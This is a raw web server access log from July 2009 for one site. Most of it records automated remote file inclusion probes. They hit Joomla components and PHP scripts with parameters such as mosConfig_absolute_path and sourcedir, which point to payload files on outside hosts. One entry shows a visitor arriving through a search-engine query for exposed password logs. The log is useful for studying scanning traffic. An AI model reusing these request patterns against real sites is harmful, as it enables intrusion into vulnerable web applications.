92.50.143.90 - - [04/Jul/2009:12:37:12 -0700] "GET /?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.hellionindustries.com"
92.50.143.90 - - [04/Jul/2009:12:37:12 -0700] "GET /logs//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 1515 "-" "libwww-perl/5.803" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:39:40 -0700] "GET /logs/access.log//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:12:39:52 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:12:39:52 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:12:39:52 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:40:09 -0700] "GET /logs/access.log//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:41:10 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:41:11 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:41:11 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
92.50.143.90 - - [04/Jul/2009:12:41:26 -0700] "GET /logs/access_090212.log//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
92.50.143.90 - - [04/Jul/2009:12:41:26 -0700] "GET /?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.hellionindustries.com"
92.50.143.90 - - [04/Jul/2009:12:41:26 -0700] "GET /logs//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 1515 "-" "libwww-perl/5.803" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:41:53 -0700] "GET /?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:41:53 -0700] "GET /logs//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:41:53 -0700] "GET /logs/scripts.log//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:42:48 -0700] "GET /?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:42:48 -0700] "GET /logs/scripts.log//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
74.53.70.114 - - [04/Jul/2009:12:42:48 -0700] "GET /logs//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.55.106.209 - - [04/Jul/2009:12:43:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:43:42 -0700] "GET ////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:43:42 -0700] "GET /logs/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:43:42 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:44:22 -0700] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:44:22 -0700] "GET /include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:44:22 -0700] "GET /logs/access.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:44:51 -0700] "GET /logs/access.log//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:44:51 -0700] "GET /include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:44:51 -0700] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:45:16 -0700] "GET /logs/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:45:16 -0700] "GET ////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:45:16 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:46:20 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:46:21 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:46:35 -0700] "GET /logs/access.log//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:46:35 -0700] "GET /logs//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:46:35 -0700] "GET /?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
94.229.66.202 - - [04/Jul/2009:12:48:14 -0700] "GET /logs/access.log%20/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:12:48:17 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:12:48:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:12:48:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:49:48 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:12:51:24 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
118.96.16.142 - - [04/Jul/2009:12:51:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:12:51:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:12:51:30 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
203.237.238.234 - - [04/Jul/2009:12:51:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.37.26.230 - - [04/Jul/2009:12:51:38 -0700] "GET /logs//?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 200 1515 "-" "libwww-perl/5.803" "www.hellionindustries.com"
218.37.26.230 - - [04/Jul/2009:12:51:38 -0700] "GET /logs/access_090212.log//?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
218.37.26.230 - - [04/Jul/2009:12:51:38 -0700] "GET /?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:55:14 -0700] "GET /?sourcedir=http://largeface.com/gnuboard4/style/idv.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:55:14 -0700] "GET /logs/access.log//?sourcedir=http://largeface.com/gnuboard4/style/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:12:55:14 -0700] "GET /logs//?sourcedir=http://largeface.com/gnuboard4/style/idv.txt???? HTTP/1.1" 200 1515 "-" "libwww-perl/5.808" "hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:56:37 -0700] "GET /dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:56:37 -0700] "GET /logs/access.log/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:56:37 -0700] "GET /logs/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:56:52 -0700] "GET /include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:56:52 -0700] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:56:52 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:57:12 -0700] "GET /include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:57:12 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:57:12 -0700] "GET /logs//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.34.42 - - [04/Jul/2009:12:58:12 -0700] "GET /errors.php?error=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
218.38.34.42 - - [04/Jul/2009:12:58:13 -0700] "GET /logs/errors.php?error=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:12:58:27 -0700] "GET /logs/access.log%20%20/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:59:51 -0700] "GET /logs/access_090521.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:12:59:54 -0700] "GET /logs/access_090521.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.34.42 - - [04/Jul/2009:13:00:39 -0700] "GET /errors.php?error=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "hellionindustries.com"
218.38.34.42 - - [04/Jul/2009:13:00:39 -0700] "GET /logs/errors.php?error=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:00:54 -0700] "GET /logs/access.log%20%20//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:00:54 -0700] "GET /?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:00:54 -0700] "GET /logs//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:02:25 -0700] "GET /?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:02:25 -0700] "GET /logs/access.log%20%20//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:02:25 -0700] "GET /logs//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:03:39 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:03:43 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:03:43 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:03:51 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:03:55 -0700] "GET /logs/access.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:03:55 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:13:04:25 -0700] "GET /dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:13:04:25 -0700] "GET /logs/access.log/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:13:04:25 -0700] "GET /logs/dg//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
220.231.126.252 - - [04/Jul/2009:13:06:37 -0700] "GET /logs/access.log//?sourcedir=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:08:11 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:08:11 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:08:11 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:09:12 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:09:12 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:09:12 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
117.121.208.254 - - [04/Jul/2009:13:10:33 -0700] "GET /logs/access_090212.log/errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
117.121.208.254 - - [04/Jul/2009:13:10:40 -0700] "GET /errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
117.121.208.254 - - [04/Jul/2009:13:10:46 -0700] "GET /logs/errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
218.186.8.248 - - [04/Jul/2009:13:13:08 -0700] "GET /logs/access.log HTTP/1.1" 200 246967 "http://www.google.com.sg/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&q=filetype%3Alog+inurl%3A*password.log%22&meta=&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.hellionindustries.com"
218.186.8.248 - - [04/Jul/2009:13:13:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.hellionindustries.com"
218.186.8.248 - - [04/Jul/2009:13:13:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:16:08 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.19.130.218 - - [04/Jul/2009:13:18:42 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:31:36 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:31:36 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:13:31:36 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:13:32:14 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
218.38.136.251 - - [04/Jul/2009:13:32:14 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
